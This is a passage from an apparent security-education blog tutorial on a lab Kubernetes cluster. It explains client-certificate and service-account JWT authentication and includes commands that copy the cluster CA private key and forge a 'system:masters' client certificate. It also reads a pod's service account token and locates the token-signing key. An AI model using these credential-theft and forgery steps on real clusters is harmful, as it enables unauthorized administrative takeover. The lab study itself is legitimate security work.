<p>OK, this is suggesting that the certificate used by the API servers TLS configuration is not trusted by curls certificate store.</p>
<p>What if we try again, but we tell curl to use our CA certificate from the config file to verify the remote TLS service?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cacert ca.crt https://kubemaster.thezoo.local:6443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {},
"code": 403
}
</code></pre></div></div>
<p>Now the TLS session works fine, but we are getting a forbidden error message from the API server.</p>
<p>What if we try again, but try and do TLS client based authentication using our extracted client certificate and key?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cacert ca.crt --cert client.crt --key client.key https://kubemaster.thezoo.local:6443/
{
"paths": [
"/.well-known/openid-configuration",
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/apiextensions.k8s.io",
[....SNIP....]
</code></pre></div></div>
<p>Now we are authenticated to the API server!</p>
<h2 id="from-the-documentation">From the documentation…</h2>
<p>So all of this analysis was basically a really long winded way of verifying that Kubernetes is using TLS client based authentication to identify users.</p>
<p>Indeed, if you read the <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/">authentication documentation</a> I referenced earlier in this post, it will tell you exactly that. Hopefully this process of analysing the various components and seeing how they are inter-related helped you understand how this works and how to identify when it might be in use in other systems that are not as well documented however.</p>
<p>The documentation also says something else thats quite interesting:</p>
<blockquote>
<p>In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call.</p>
<p>Even though a normal user cannot be added via an API call, any user that presents a valid certificate signed by the cluster’s certificate authority (CA) is considered authenticated. In this configuration, Kubernetes determines the username from the common name field in the ‘subject’ of the cert (e.g., “/CN=bob”). From there, the role based access control (RBAC) sub-system would determine whether the user is authorized to perform a specific operation on a resource. For more details, refer to the normal users topic in certificate request for more details about this.</p>
</blockquote>
<p>Looking at the Subject value from our client certificate <code class="language-plaintext highlighter-rouge">O = system:masters, CN = kubernetes-admin</code> - this is the value thats being referred to here. The username we logon as with our certificate is <code class="language-plaintext highlighter-rouge">kubernetes-admin</code>, and <code class="language-plaintext highlighter-rouge">system:masters</code> is presented to the authorization system to determine what we can do.</p>
<h2 id="forging-user-certificates">Forging user certificates</h2>
<p>Something the documentation does not explicitly say, is that if we can get our hands on the key associated with the Kubernetes root CA certificate, we can create our own arbitrary client certificates (although once you understand how X.509 systems work this conclusion is straightforward).</p>
<p>The <code class="language-plaintext highlighter-rouge">kube-controller-manager</code> pod has access to this key, which is referred to as the <code class="language-plaintext highlighter-rouge">cluster-signing-key-file</code>. The runtime configuration of the pod will tell you where the key is being accessed from.</p>
<p>We can find this location by first geting the name of the correct pod (which will be different depending on the domain name of your Kubernetes host).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ kubectl -n kube-system get pods | grep controller-manager
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 7d5h
</code></pre></div></div>
<p>Then get the appropriate runtime configuration setting using a command like the following (substitute the name of your controller-manager in the command below, mine is <code class="language-plaintext highlighter-rouge">kube-controller-manager-kubemaster.thezoo.local</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ kubectl -n kube-system describe pods kube-controller-manager-kubemaster.thezoo.local | grep cluster-signing-key-file
--cluster-signing-key-file=/etc/kubernetes/pki/ca.key
</code></pre></div></div>
<p>Let’s take a local copy of the key and check it to confirm the key matches the CA certificate by using the public modulus hash comparing approach used above.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ sudo cp /etc/kubernetes/pki/ca.key .
stephen@kubemaster:~/certs$ sudo chown stephen:stephen ca.key
stephen@kubemaster:~/certs$ openssl rsa -modulus -noout -in ca.key | openssl sha256
SHA256(stdin)= a6f3d5be9a4e70fbac48dbdf7427bfae278106ba001db3340b3e608f2288efed
stephen@kubemaster:~/certs$ openssl x509 -modulus -noout -in ca.crt | openssl sha256
SHA256(stdin)= a6f3d5be9a4e70fbac48dbdf7427bfae278106ba001db3340b3e608f2288efed
</code></pre></div></div>
<p>The hashes match - we can use this key to create our own authentication certificates.</p>
<p>Forging an X.509 certificate using only openssl that will work with Kubernetes is a little more awkward than I would like, so I created a file with a number of helper functions in Python to make it easier. Most of it is boilerplate stuff that works with keys and certificates to convert them between files on disk and Python objects, with the unique work being done by a function named <code class="language-plaintext highlighter-rouge">create_certificate</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">create_certificate</code> function creates a new X.509 certificate with all the expected static fields and values expected by Kubernetes for a client certificate, with some of the more specific steps being that it:</p>
<ul>
<li>Sets the the Subject with the Common Name matching our chosen username and Origanization Names matching our desired roles;</li>
<li>Sets the Issuer of our certificate to match the Subject from the CA’s certificate;</li>
<li>Sets the Authority Key Identifier to match the ID of the CA’s public key;</li>
<li>Signs the certificate using the CA’s private key; and</li>
<li>Optionally performs signature verification and Issuer-Subject matching of the new certificate against the CA certificate.</li>
</ul>
<p>The following steps will get the code and setup a python venv that we can use on our Ubuntu system to do the forging. (The venv setup is necessary as the Kubernetes setup guide referenced above installs a version of the Python cryptopgraphy library that is incompatible with this code).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ wget https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/master/example_code/crypto_helpers.py
stephen@kubemaster:~/certs$ sudo apt -y install python3-pip python3.10-venv
stephen@kubemaster:~/certs$ python3 -m venv crypto
stephen@kubemaster:~/certs$ source crypto/bin/activate
(crypto) stephen@kubemaster:~/certs$ pip install PyJWT cryptography ipython
</code></pre></div></div>
<p>From here we are going to be running the appropriate functions to do the client certificate forgery from within iPython. You can see <a href="https://thegreycorner.com/2023/08/16/iPython-for-cyber-security.html">this blog post</a> for some more background info on doing security stuff in iPython if you’re interested.</p>
<p>The following commented iPython session shows the steps required to use the <code class="language-plaintext highlighter-rouge">create_certificate</code> function to create a forged certificate and write it’s output to disk in the present working directory as <code class="language-plaintext highlighter-rouge">forged.crt</code> and <code class="language-plaintext highlighter-rouge">forged.key</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ ipython
Python 3.10.12 (main, Jun 11 2023, 05:26:28) [GCC 11.4.0]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.17.2 -- An enhanced Interactive Python. Type '?' for help.
In [1]: # read file containing helper functions into Python memory
In [2]: exec(open('crypto_helpers.py').read())
In [3]: # create a new private key
In [4]: forged_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
In [5]: # get the public key from the new private key
In [6]: forged_public_key = forged_private_key.public_key()
In [7]: # read the CAs private key from disk
In [8]: ca_private_key = private_key_from_file('ca.key')
In [9]: # read the CA certificate from disk
In [10]: ca_cert = cert_from_file('ca.crt')
In [11]: # create a forged certificate associated with our new key for 'stephen' with highly privileged roles 'system:masters'
In [12]: forged_cert = create_certificate(forged_public_key, ca_private_key, ca_cert, common_name='stephen', org_names = ['system:masters'])
In [13]: # write forged cert to disk as 'forged.crt'
In [14]: cert_to_disk(forged_cert, 'forged.crt')
In [15]: # write new private key to disk as 'forged.crt'
In [16]: private_key_to_disk(forged_private_key, 'forged.key')
In [17]: exit
</code></pre></div></div>
<p>Now we have our forged key and certificate on disk, let’s try them with curl to confirm they work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cert forged.crt --key forged.key --cacert ca.crt https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>We have now successfully created our own X.509 client authentication certificate for Kubernetes!</p>
<h1 id="service-account-jwt-based-authentication">Service account JWT based authentication</h1>
<p>Next let’s look at the other most commonly used Kubernetes authentication scenario - service accounts used by system entities. Unlike people accounts, these need to be added to the Kubernetes system with permissions assigned before they can be used. We cant just make up our own arbitrary names and assign permissions like we just did with user accounts. In addition, service accounts are bound to particular namespaces, unlike normal user accounts which are cluster wide, which means we have to consider this when authenticating.</p>
<p>We will explore service account authentication via the medium of the <code class="language-plaintext highlighter-rouge">default:default</code> service account (e.g. the account named <code class="language-plaintext highlighter-rouge">default</code> in the <code class="language-plaintext highlighter-rouge">default</code> namespace). This account exists in a base install and will be automatically mounted for use by running pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace.</p>
<p>To make it a bit easier to tell whether we are authenticated as it or not we are going to grant this account some additional permissions it does not normally have - view access to resources in the <code class="language-plaintext highlighter-rouge">default</code> namespace.</p>
<p>We can do this like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl create rolebinding default-view --clusterrole=view --serviceaccount=default:default --namespace=default
rolebinding.rbac.authorization.k8s.io/default-view created
</code></pre></div></div>
<h2 id="using-the-service-account-from-within-a-pod">Using the service account from within a pod</h2>
<p>Now we are going to gain access to a running pod in the <code class="language-plaintext highlighter-rouge">default</code> namespace in order to use this service account.</p>
<p>First let’s identify our running pods in this namespace. Here are mine, created as part of the setup tutorial linked earlier.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-app-5777b5f95-97489 1/1 Running 0 3h55m
nginx-app-5777b5f95-tfwt5 1/1 Running 0 3h55m
</code></pre></div></div>
<p>We will access the first pod in the list -<code class="language-plaintext highlighter-rouge">nginx-app-5777b5f95-97489</code>. First we will copy the <code class="language-plaintext highlighter-rouge">kubectl</code> command line tool into the pod so we can easily query the Kubernetes API from within the pod using the service account credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl cp `which kubectl` nginx-app-5777b5f95-97489:/usr/bin/
</code></pre></div></div>
<p>Now let’s open a bash shell in the pod.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl exec -it nginx-app-5777b5f95-97489 -- /bin/bash
root@nginx-app-5777b5f95-97489:/#
</code></pre></div></div>
<p>Let’s list pods from the container. Note we can see pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace (used if no namespace is explicly named), but we cannot see them in the <code class="language-plaintext highlighter-rouge">kube-system</code> namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-app-5777b5f95-97489 1/1 Running 0 3h58m
nginx-app-5777b5f95-tfwt5 1/1 Running 0 3h58m
root@nginx-app-5777b5f95-97489:/# kubectl get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-system"
</code></pre></div></div>
<p>Also note, there is no kubectl config file like we had on the host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# ls ~/.kube/config
ls: cannot access '/root/.kube/config': No such file or directory
</code></pre></div></div>
<p>How then is <code class="language-plaintext highlighter-rouge">kubectl</code> finding the API server and authenticating?</p>
<p>There are actually a few ways that the Kubernetes API server can be located from within a container.</p>
<p>The first is via DNS. Kubernetes will create a <code class="language-plaintext highlighter-rouge">kubernetes</code> service in the <code class="language-plaintext highlighter-rouge">default</code> namespace to allow the API server to be easily discovered. This will have an <code class="language-plaintext highlighter-rouge">A</code> record giving the internal cluster address of the API server at address <code class="language-plaintext highlighter-rouge">kubernetes.default.svc.cluster.local</code>, and a <code class="language-plaintext highlighter-rouge">SRV</code> record giving the internal port of the service (usually 443) at address <code class="language-plaintext highlighter-rouge">_https._tcp.kubernetes.default.svc.cluster.local</code>.</p>
<p>The second is via environment variables with <code class="language-plaintext highlighter-rouge">KUBERNETES</code> in the name, as shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# env | grep KUBERNETES
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
</code></pre></div></div>
<p>The credentials are provided to the container via a tmpfs mount configured automatically by Kubernetes when it runs the pod. You can see this using the mount command. The default path is <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# mount | grep serviceaccount
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime,size=3902996k,inode64)
</code></pre></div></div>
<p>This folder contains 3 files, as shown below (I have added some spacing between commands in the output below to make things a little more readable).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# ls /run/secrets/kubernetes.io/serviceaccount/
ca.crt namespace token
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
-----BEGIN CERTIFICATE-----
MIIDBTCCAe2gAwIBAgIIBy6KdfKkQ3gwDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0zMzExMDUwMTI1NDZaMBUx
EzARBgNVBAMTCmt1YmVybmV0ZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQC+lUi8cHdUbcbHUbFY2fCWxQ4+On9jV4isqXeuysD+hvT4PaY9TM/OzOwP
OA1YmyhSTrADlS+jjqfx/O73cE15Sw5JoW3JyTmmo8sp1E8ODB0U7YtOVirRBMen
lkJSKP9BMTMNaInEbH/8zP5I/Y5lcIVGy6b1BYsG/+/Bwj4bAPgm7ZQfkhkyqY2j
jxcUh0/H5bUFXeFdyFhhqxIvHaDsKG5bhVHREmuLSJsoTG8ygD/i3nhtkxF0KHxj
A1+QKdDjaTYajnacnZ2jG+AFENMC2NYw3rAMX/P54Np6P9JkukCS+XK2lCvb3PIq
SadMIj+lITTjezbgcw2cv2A+6B5DAgMBAAGjWTBXMA4GA1UdDwEB/wQEAwICpDAP
BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgYbD4N8i7PgpS7OKuEb5xlEHEnDAV
BgNVHREEDjAMggprdWJlcm5ldGVzMA0GCSqGSIb3DQEBCwUAA4IBAQAUjRiaXfQN
aE45Vcw52/bXev/7ZZq7Nd/k8CFygKNr2rmiNQcIkI71qvILDxFhOsNUhaITGQNZ
dYOfg7D976agn1HtcAAm9IIEAihnu9SLXW4sQvXpWXG+zSNzd21JDKD/Yyr2nCTM
+6jMSQbl9gGOjXCuES4f7jyjEtUDHyttiCxRDUnzSoporlG8j/xzhP8iZHCzRVGP
in9a/iEx9ReCNrnsKSH7JuAfX0YzLAAJx5JWA4j3qoI2bPgAv/naUOiJckYZTuks
wdBrTDRT8krq8JgcBLBDkV6nUD45+llHAB8GunHXdtIXw4tKtBuLgxk44KUQJdov
xwf5rtvfVj66
-----END CERTIFICATE-----
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/namespace
default
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token
eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">ca.crt</code> is the same Kubernetes Certificate Authority that identifies the API servers TLS certificate, as we saw in the last section.</p>
<p>The <code class="language-plaintext highlighter-rouge">namespace</code> file identifies the namespace that the container is running in.</p>
<p>The <code class="language-plaintext highlighter-rouge">token</code> file is the authentication credentials for the service account, in the form of a JWT.</p>
<p>We can decode the header and claims section of the JWT to get some more insight into how it works. This basically involves splitting the token on the period (“.”) character and URL safe base64 decoding the first and second sections of the token, padding with “=” where necessary.</p>
<p>The first part of the token is the header, which usually identifies the algorithm used to sign the JWT and other values that might be used by recipients to parse the token correctly.</p>
<p>The second part contains claim data, the primary content of the JWT, and is usually used to identify a user.</p>
<p>The third part of the JWT contains the signature that verifies the authenticity of the claim and header data and is not useful to us until we want to identify keys and create our own tokens.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token | echo "$(cut -d '.' -f 1)==" | base64 -d
{"alg":"RS256","kid":"SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI"}
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token | echo "$(cut -d '.' -f 2)==" | base64 -d
{"aud":["https://kubernetes.default.svc.cluster.local"],"exp":1731564966,"iat":1700028966,"iss":"https://kubernetes.default.svc.cluster.local","kubernetes.io":{"namespace":"default","pod":{"name":"nginx-app-5777b5f95-97489","uid":"52a7105a-fcff-49c2-9759-1815bd078fd7"},"serviceaccount":{"name":"default","uid":"dfa13ceb-5160-4a1a-9803-049e4873a609"},"warnafter":1700032573},"nbf":1700028966,"sub":"system:serviceaccount:default:default"}
</code></pre></div></div>
<p>This gives us a lot of information, the most useful of which is:</p>
<ul>
<li>The JWT signing algorithm used, <code class="language-plaintext highlighter-rouge">RS256</code>, which involves signing the JWT with a 2048 bit RSA key (the private key is used to sign and the public key to verify).</li>
<li>The keyid (kid) of the public key used for verification of the JWT <code class="language-plaintext highlighter-rouge">SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI</code>. This is generated algorithmicly from the public key’s contents and we have the option to use this to confirm we have the correct key to create our own tokens when we find it.</li>
<li>Various details of the service account associated with the token, including it’s name <code class="language-plaintext highlighter-rouge">default</code>, it’s namespace <code class="language-plaintext highlighter-rouge">default</code> and it’s uid <code class="language-plaintext highlighter-rouge">dfa13ceb-5160-4a1a-9803-049e4873a609</code>. If we didn’t already know the name of the service account being used, we could work it out from here.</li>
<li>A template of the claim data that is required for a token to be accepted as valid by Kubernetes. Authentication systems using JWTs usually expect specific claim data to be considered valid, and this gives us a working example of what claims might be required.</li>
</ul>
<p>Similar to what we did for client certificates, we can also use curl to authenticate to the Kubernetes API with the JWT, which will allow us to more easily test our own tokens once we create them.</p>
<p>We do this by using the <code class="language-plaintext highlighter-rouge">Authorization</code> header to send the token in our HTTP requests to the API server as a <code class="language-plaintext highlighter-rouge">Bearer</code> token. This header would look like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA
</code></pre></div></div>
<p>Heres how thats done in curl, reading the CA cert and token from their files on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# curl --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc.cluster.local/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<h2 id="identifying-the-jwt-key">Identifying the JWT key</h2>
<p>Let’s exit out of the container and work on the host again. The first thing we will do is install a command line tool that supports verification of JWTs that we can use to identify the key that was used for signing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# exit
exit
(crypto) stephen@kubemaster:~/certs$ sudo apt install jwt
[....SNIP....]
</code></pre></div></div>
<p>With that installed we are ready to start testing keys.</p>
<p>The <code class="language-plaintext highlighter-rouge">RS256</code> algorithm signs keys using the RSA private key and verifies them using the public key. To find the keypair that is being used in this Kubernetes system for creating JWTs such as our reference token shown above, we can take an existing token and try and verify it using a candidate public key. If it passes verification, its the right key.</p>
<p>As mentioned above, it is also possible in the case of Kubernetes to identify the key being used to sign a JWT by algorithmically generating the key ID from a candidate public key and comparing it to the <code class="language-plaintext highlighter-rouge">kid</code> value in the JWT header. However, given that I also wanted this post to be used as an example guide for assessing cryptosystems, this approach will not be universally applicable as algorithmically generated key IDs are not used in all systems, so the more straightforward method of attempting to verify the JWT using candidate public keys is probably preferable.</p>
<p>Since we already have the CA key for the Kubernetes system retrieved from our last section we can try that for verification to see ifs the correct key. (Spoiler alert, this is NOT the correct key, but let’s go through the process anyway).</p>
<p>Let’s write the token to file on our host, extract the public key from the ca private key to it’s own file and try and use it to verify our token.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ echo 'eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA' > token
(crypto) stephen@kubemaster:~/certs$ openssl rsa -in ca.key -pubout -out ca.pub
writing RSA key
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key ca.pub -verify token
Error: couldn't parse token: crypto/rsa: verification error
</code></pre></div></div>
<p>OK, no good. As it turns out, there is a dedicated keypair for signing service account tokens in Kubernetes. In our sample Kubernetes system there are two pods that reference it - the API server and the controller manager.</p>
<p>Let’s grab the names of the appropriate pods (they will be different depending on your Kubernetes servers hostname).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
calico-kube-controllers-658d97c59c-88r9c 1/1 Running 0 7d5h
calico-node-fwptx 1/1 Running 0 7d5h
coredns-5dd5756b68-snhk5 1/1 Running 0 7d5h
coredns-5dd5756b68-vlb88 1/1 Running 0 7d5h
etcd-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-apiserver-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-proxy-w2xfd 1/1 Running 0 7d5h
kube-scheduler-kubemaster.thezoo.local 1/1 Running 0 7d5h
</code></pre></div></div>
<p>Now, given the names of the pods, we can find the location from where the key is referenced by looking at the <code class="language-plaintext highlighter-rouge">service-account-private-key-file</code> (kube-controller-manager pod) or <code class="language-plaintext highlighter-rouge">service-account-signing-key-file</code> (kube-apiserver pod) parameters.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl describe pods -n kube-system kube-controller-manager-kubemaster.thezoo.local | grep 'service-account'
--service-account-private-key-file=/etc/kubernetes/pki/sa.key
--use-service-account-credentials=true
(crypto) stephen@kubemaster:~/certs$ kubectl describe pods -n kube-system kube-apiserver-kubemaster.thezoo.local | grep 'service-account'
--service-account-issuer=https://kubernetes.default.svc.cluster.local
--service-account-key-file=/etc/kubernetes/pki/sa.pub
--service-account-signing-key-file=/etc/kubernetes/pki/sa.key
</code></pre></div></div>
<p>The file we are after is <code class="language-plaintext highlighter-rouge">/etc/kubernetes/pki/sa.key</code>. Let’s grab it, change ownership, extract the public key to it’s own file and retry verification.</p>
